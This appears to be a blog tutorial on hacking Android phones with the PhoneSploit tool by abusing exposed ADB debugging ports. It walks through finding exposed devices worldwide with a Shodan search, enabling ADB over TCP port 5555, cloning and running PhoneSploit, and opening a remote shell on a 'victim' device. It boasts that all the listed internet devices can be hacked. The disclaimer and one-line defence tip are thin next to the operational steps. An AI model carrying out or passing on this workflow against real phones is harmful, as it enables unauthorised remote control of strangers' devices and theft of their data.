Welcome to another android hacking tutorial. Today we are going to review android hacking tool called phonesploit. If you have been reading my previous articles, you know that hacking android is as easy as stealing candy from a kid. So let’s check out what this tool can do.
What is Phonesploit?
Phonesploit is a python script which uses the adb exploit about which I had written previously in an article. Instead of the troublesome way, it makes it very easy to hack android phones with adb by misusing the functionality of adb.
Many people unknowingly keep their android devices in USB debugging mode and keep open ports without knowing.
You can find these open adb ports by using a search engine like Shodan, which finds all devices on the internet. To see these ports, you must log in to Shodan. You can find open ports by doing the following search on Shodan:
“Android Debug Bridge”
You will get the following search results :
All these devices can be hacked. See how practical this hack is?
Disclaimer :
Please be aware that hacking is illegal unless you have permission from the account owner and the parties involved. This post should be used as a tool to help people understand how hackers are hacking android devices with the adb server. The Hacking world team shall not be held responsible if any criminal charges are brought against any person who misuses the information on this website to violate the law.
Now for the purposes of this tutorial, I will be hacking my own android phone.
Part 1: Enable developer options
Step 1:
Go to about phone settings and then tap 7 times on “Build Number.”
Step 2:
Now go to developers settings as shown and toggle on the
USB Debugging
Part 2:- Install ADB in Kali Linux and connect your device
Step1: Open a Kali Linux terminal and type the following command to install ADB:
sudo apt-get install adb
Once ADB is installed in your Kali Machine, connect the android device, and allow the USB Debbuging when prompted by android.
You can use the following command to check if the device is connected correctly or not.
adb devices
As you can see in the image below, my phone is connected.
Now we need to enable some settings to allow the hack over wifi.
Type the following
adb usb
then install and enable tcpip by typing the following command.
adb tcpip 5555
Now connect your Android device to wifi and type the following command:
adb connect xxx.xxx.xxx.xxxx
Note: xxx.xxx.xxx.xxx is the IP address of the device.
Part 3:- Install PhoneSploit tool in Kali Linux
This script is available for both Linux and Windows. But I recommend kali Linux after all your an ethical hacker now:
Run the following commands to clone the Phonesploit repo into your Kali Linux:
git clone https://github.com/Zucccs/PhoneSploit.git
Now install some required dependencies for phonesploit with the following command:
pip install colorama
cd PhoneSploit
Now to install phonesploit execute the following command
python main_linux.py
Once the installation of phonesploit is done, you will see the following screen.
Now to hack any android device on the internet (in my case it’s my phone)
Type 3 in the phonesploit terminal and enter the IP Address of the victim device:
Now to access the shell on the hacked phone, simply type 4 You will be asked for a device name:
Now the format for device name is:
address (IP + Port Number). In my case, it will be
adb connect 192.168.0.xxxx:5555:
And viola the device has shell access. Which means we can hack and control the device remotely over the internet.
This hack is quite similar to my adb hack and requires USB debugging to open or for you to have access to the victim’s device.
You can also find random devices on the internet with Shodan, as shown previously.
How to protect yourself from this phonesploit hack?
Disable USB debugging and developer options
![13 Best Game Hacker Apps for Android 2020 [With/Without Root]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vVTgKF6W3rD3a2I7VogsgH81QLGxa7k9jqnaNyH_gCjpNUja6_fTPPseE_MR3XX0DV-8qTUOpxxZjtoRsdNWt45Nsd7W_hce9Cq6Poz2J15pgJmbc=w100)
0 Comments